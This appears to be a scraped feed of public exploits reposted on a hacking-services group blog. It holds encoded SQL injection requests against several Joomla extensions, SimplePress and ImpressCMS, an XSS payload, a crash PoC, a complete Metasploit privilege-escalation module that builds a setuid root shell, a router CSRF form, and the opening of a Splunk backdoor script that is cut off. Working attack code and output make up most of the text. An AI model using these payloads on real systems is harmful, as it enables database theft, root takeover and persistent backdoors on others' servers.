# Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/
# Version: 1.9.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/menu-listing-layout/menuitems
#
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%4e%52%3a%3d%30%29%2c%28%53%45%4c%45%43%54%28%30%29%46%52%4f%4d%28%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%29%57%48%45%52%45%28%54%41%42%4c%45%5f%53%43%48%45%4d%41%21%3d%30%78%36%39%36%65%36%36%36%66%37%32%36%64%36%31%37%34%36%39%36%66%36%65%35%66%37%33%36%33%36%38%36%35%36%64%36%31%29%41%4e%44%28%30%78%30%30%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%40%78%2c%4c%50%41%44%28%40%4e%52%3a%3d%40%4e%52%25%32%62%31%2c%34%2c%30%78%33%30%29%2c%30%78%33%61%32%30%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2d%2d%20%2d
# keysearch=[SQL]
# categories[]=[SQL]
# min=[SQL]
# max=[SQL]
POST /[PATH]/menu-listing-layout/menuitems HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
csmodid=236&Itemid=303&keysearch=' union select (SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
HTTP/1.1 500 You have an error in your SQL .....#__associations<br>0007: #__banner_clients<br>0008: #__banner_tracks<br>0009: #__banners<br>0010:X-Powered-By: PHP/5.6.16
Date: Tue, 22 Jan 2019 19:04:29 GMT
Server: Apache
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588221
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/j-classifiedsmanager/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/component/jclassifiedsmanager/
#
&categorySearch=[SQL]
&adType=[SQL]
&citySearch=[SQL]
POST /[PATH]/component/jclassifiedsmanager/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 779
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45 2%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads: undefined
HTTP/1.1 500 Internal Server Error
Date: Wed, 23 Jan 2019 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49d9cb37b64998d7-LAX
# Exploit Title: Joomla! Component J-BusinessDirectory 4.9.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/
# Version: 4.9.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=[SQL]&term=a
#
GET /[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 15:45:13 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=172800
Expires: Fri, 25 Jan 2019 15:45:13 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49da034bc2faba72-ATL
# Exploit Title: SimplePress CMS 1.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/simplepresscms/
# Software Link: https://ayera.dl.sourceforge.net/project/simplepresscms/1.0%20alpha/1.0.7_alpha.zip
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?p=[SQL]
#
GET /[PATH]/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0; PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 22:38:49 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3169
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/?s=[SQL]
#
GET /[PATH]/?s=%27)%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0; PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 22:42:44 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3280
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: SirsiDynix e-Library <= 3.5.x - Cross-Site Scripting
# CVE: CVE-2018-20503
# Date: 2019-24-01
# Google Dork: inurl:/x/x/0/49
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://www.sirsidynix.com
# Version: 3.5.x
# Category: Webapps
# Tested on: Firefox/52 and Chrome/69
# Software Description : As SirsiDynix Symphony’s core discovery portal,
e-Library gives
# Symphony users the basic tools they need to find the resources they seek.
# e-Library offers users speedy and relevant search results as well as a
user-friendly interface to make discovery simple
# Description : Exploiting these issues could allow an attacker to steal
cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent
vulnerabilities in the underlying database.
# SirsiDynix e-Library 3.5.x is vulnerable; prior versions may also be
affected.
# ==================================================================
# PoC:
# POST Request (sort_by):
POST /uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123 HTTP/1.1
Host: target
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix
==================================================================
# Exploit Title: Joomla! Component JHotelReservation 6.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jhotelreservation/
# Version: 6.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
#
POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d7fe0824bc450154b7edd5f562e512afc1548262808; c9ffd68b334eb414c880fa254194ecbb=11aaa3e0c1191242b5a84d567379c503; PHPSESSID=75e6cfdbe3676f9393a6114534ed9845
Alt-Used: TARGET:443
Connection: keep-alive
Content-Tye: application/x-www-form-urlencoded
Content-Length: 965
task=hotels.searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=1%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d&guest_adult=2&guest_child=0&filterParams=facilityId%3D1&resetSearch=0'&searchType=&searchId=&priceLow=&priceHigh=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=Paris&jhotelreservation_datas=23-01-2019&jhotelreservation_datae=24-01-2019&jhotelreservation_rooms=1&jhotelreservation_guest_adult=2&jhotelreservation_guest_child=0
HTTP/2.0 200 OK
Date: Wed, 23 Jan 2019 17:04:10 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 23 Jan 2019 17:04:10 GMT
Server: cloudflare
CF-RAY: 49dbd67c5d91c820-DFW
Content-Encoding: gzip
X-Firefox-Spdy: h2
# Exploit Title: Joomla! Component J-CruisePortal 6.0.4 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://www.cmsjunkie.com/joomla-cruise-reservation-portal
# Version: 6.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/cruises
#
POST /[PATH]/cruises/cruises HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 518
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e; 398e9ff8e95a4e22822ceef0b6c44a4a=a94f101ca5d3b159ceea66309ea3a951; joomla_user_state=logged_in; 886feb4c8becc9e8152c352c36facdb9=0a4cabcc031321270d6811b7ab5222b0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
controller=search&task=searchCruises&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&cruise_id=&day_end=24&rooms=1&guest_adult=2%20%20%2f%2a%21%31%31%31%31%31%61%6e%44%2a%2f%20%73%6c%65%65%70%28%35%29&guest_child=0&filterParams=&resetSearch=1&searchType=&searchId=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=&jcruisereservation_datas=01%2F23%2F2019&jcruisereservation_datae=01%2F24%2F2019&jcruisereservation_rooms=1&jcruisereservation_guest_adult=2&jcruisereservation_guest_child=0: undefined
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 16:42:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 23 Jan 2019 16:42:13 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49dbb4e4622dc7e8-DFW
# Exploit Title: Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
# Date: 2019/01/24
# Author: Saeed Hasanzadeh (Net.Hun73r)
# Twitter: @nethun73r
# Software Link: https://itunes.apple.com/us/app/microsoft-remote-desktop-10/id1295203466?mt=12
# Version: 10.2.4(134)
# Tested on: Mac OS Mojave(10.14.2)
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the add Desktop > add user account >UserName
# App will now crash
buffer = "A" * 600
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AddressSanitizer (ASan) SUID Executable Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems using
setuid executables compiled with AddressSanitizer (ASan).
ASan configuration related environment variables are permitted when
executing setuid executables built with libasan. The `log_path` option
can be set using the `ASAN_OPTIONS` environment variable, allowing
clobbering of arbitrary files, with the privileges of the setuid user.
This module uploads a shared object and sprays symlinks to overwrite
`/etc/ld.so.preload` in order to create a setuid root shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Szabolcs Nagy', # Discovery and PoC
'infodox', # unsanitary.sh Exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2016-02-17',
'Platform' => 'linux',
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'AppendExit' => true,
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true
},
'References' =>
[
['URL', 'https://seclists.org/oss-sec/2016/q1/363'],
['URL', 'https://seclists.org/oss-sec/2016/q1/379'],
['URL', 'https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e'],
['URL', 'https://github.com/bcoles/local-exploits/tree/master/asan-suid-root']
],
'Notes' =>
{
'AKA' => ['unsanitary.sh']
},
'DefaultTarget' => 0))
register_options [
OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable compiled with ASan', '']),
OptInt.new('SPRAY_SIZE', [true, 'Number of PID symlinks to create', 50])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir']
end
def suid_exe_path
datastore['SUID_EXECUTABLE']
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def upload_and_compile(path, data, gcc_args='')
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
unless gcc_args.to_s.blank?
gcc_cmd << " #{gcc_args}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error 'Compiling failed:'
print_line output
end
register_file_for_cleanup path
chmod path
end
def check
unless setuid? suid_exe_path
vprint_error "#{suid_exe_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_exe_path} is setuid"
# Check if the executable was compiled with ASan
#
# If the setuid executable is readable, and `ldd` is installed and in $PATH,
# we can detect ASan via linked libraries. (`objdump` could also be used).
#
# Otherwise, we can try to detect ASan via the help output with the `help=1` option.
# This approach works regardless of whether the setuid executable is readable,
# with the obvious disadvantage that it requires invoking the executable.
if cmd_exec("test -r #{suid_exe_path} && echo true").to_s.include?('true') && command_exists?('ldd')
unless cmd_exec("ldd #{suid_exe_path}").to_s.include? 'libasan.so'
vprint_error "#{suid_exe_path} was not compiled with ASan"
return CheckCode::Safe
end
else
unless cmd_exec("ASAN_OPTIONS=help=1 #{suid_exe_path}").include? 'AddressSanitizer'
vprint_error "#{suid_exe_path} was not compiled with ASan"
return CheckCode::Safe
end
end
vprint_good "#{suid_exe_path} was compiled with ASan"
unless has_gcc?
print_error 'gcc is not installed. Compiling will fail.'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
unless writable? pwd.to_s.strip
fail_with Failure::BadConfig, "#{pwd.to_s.strip} working directory is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
@log_prefix = ".#{rand_text_alphanumeric 5..10}"
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
rootshell_name = ".#{rand_text_alphanumeric 5..10}"
@rootshell_path = "#{base_dir}/#{rootshell_name}"
rootshell = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
EOF
upload_and_compile @rootshell_path, rootshell, '-Wall'
lib_name = ".#{rand_text_alphanumeric 5..10}"
lib_path = "#{base_dir}/#{lib_name}.so"
lib = <<-EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
EOF
upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'
spray_name = ".#{rand_text_alphanumeric 5..10}"
spray_path = "#{base_dir}/#{spray_name}"
spray = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
upload_and_compile spray_path, spray, '-Wall'
exp_name = ".#{rand_text_alphanumeric 5..10}"
exp_path = "#{base_dir}/#{exp_name}"
exp = <<-EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
EOF
upload_and_chmodx exp_path, exp
print_status 'Launching exploit...'
output = cmd_exec exp_path
output.each_line { |line| vprint_status line.chomp }
unless setuid? @rootshell_path
fail_with Failure::Unknown, "Failed to set-uid root #{@rootshell_path}"
end
print_good "Success! #{@rootshell_path} is set-uid root!"
vprint_line cmd_exec "ls -la #{@rootshell_path}"
print_status 'Executing payload...'
cmd_exec "echo #{payload_path} | #{@rootshell_path} & echo "
end
def cleanup
# Safety check to ensure we don't delete everything in the working directory
if @log_prefix.to_s.strip.eql? ''
vprint_warning "#{datastore['SPRAY_SIZE']} symlinks may require manual cleanup in: #{pwd}"
else
cmd_exec "rm #{pwd}/#{@log_prefix}*"
end
ensure
super
end
def on_new_session(session)
# Remove rootshell executable
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @rootshell_path
else
session.shell_command_token "rm -f '#{@rootshell_path}'"
end
ensure
super
end
end
<!--
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @alicangonullu
Exploits :
-->
<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit'
value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>
# Title: ImpressCMS 1.3.11 - 'bid' SQL Injection
# Date: 21.01.2019
# Exploit Author: Mehmet Onder Key
# Vendor Homepage: http://www.impresscms.org/
# Software Link:
https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip
# Version: v1.3.11
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
ImpressCMS is a community developed Content Management System. With this
tool maintaining the content of a website becomes as easy as writing a word
document. ImpressCMS is the ideal tool for a wide range of users: from
business to community users, from large enterprises to people who want a
simple, easy to use blogging tool.
# Vulnerabilities:
# An attacker can access all data following an un/authorized user login
using the parameter.
# POC - SQLi :
# Parameter: bid (POST)
# Request URL: http://localhost/impress/modules/system/admin.php?bid=12
# Type : time-based blind
bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==
#!/usr/bin/python
# Exploit Title: Splunk Enterprise 7.2.3 Custom App RCE (persistent backdoor)
# Date: January 23, 2019
# Exploit Author: Lee Mazzoleni
# Vendor Homepage: https://www.splunk.com/
# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html
# Version: 7.2.3
# Tested on: kali 4.18.0-kali2-amd64
# CVE : n/a
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
from sys import stdout,argv
from os import getcwd,path,system
from subprocess import Popen
# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases
gecko_driver_path = '/root/Desktop/SplunkSploit/Gecko/geckodriver'
def checkLogin(url):
if '/login' not in url and '/logout' not in url:
print 'Login successful!'
else:
print 'Login failed! Aborting...'
exit()
def checkUrl(url):
if '_upload' not in url:
print '[-] Navigation error, aborting...'
exit()
def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport):
print '[+] Starting bot ...'
profile = webdriver.FirefoxProfile()
profile.accept_untrusted_certs = True
driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)
print '[*] Loading the target page ...'
driver.get(splunk_target_url)
sleep(1)
stdout.write('[*] Attempting to log in with the provided credentials ... ')
username_field = driver.find_element_by_name("username")
username_field.clear()
username_field.send_keys(splunk_admin_user)
sleep(1)
pw_field = driver.find_element_by_name("password")
pw_field.clear()
pw_field.send_keys(splunk_admin_pass)
pw_field.send_keys(Keys.RETURN)
sleep(3)
current_url = driver.current_url
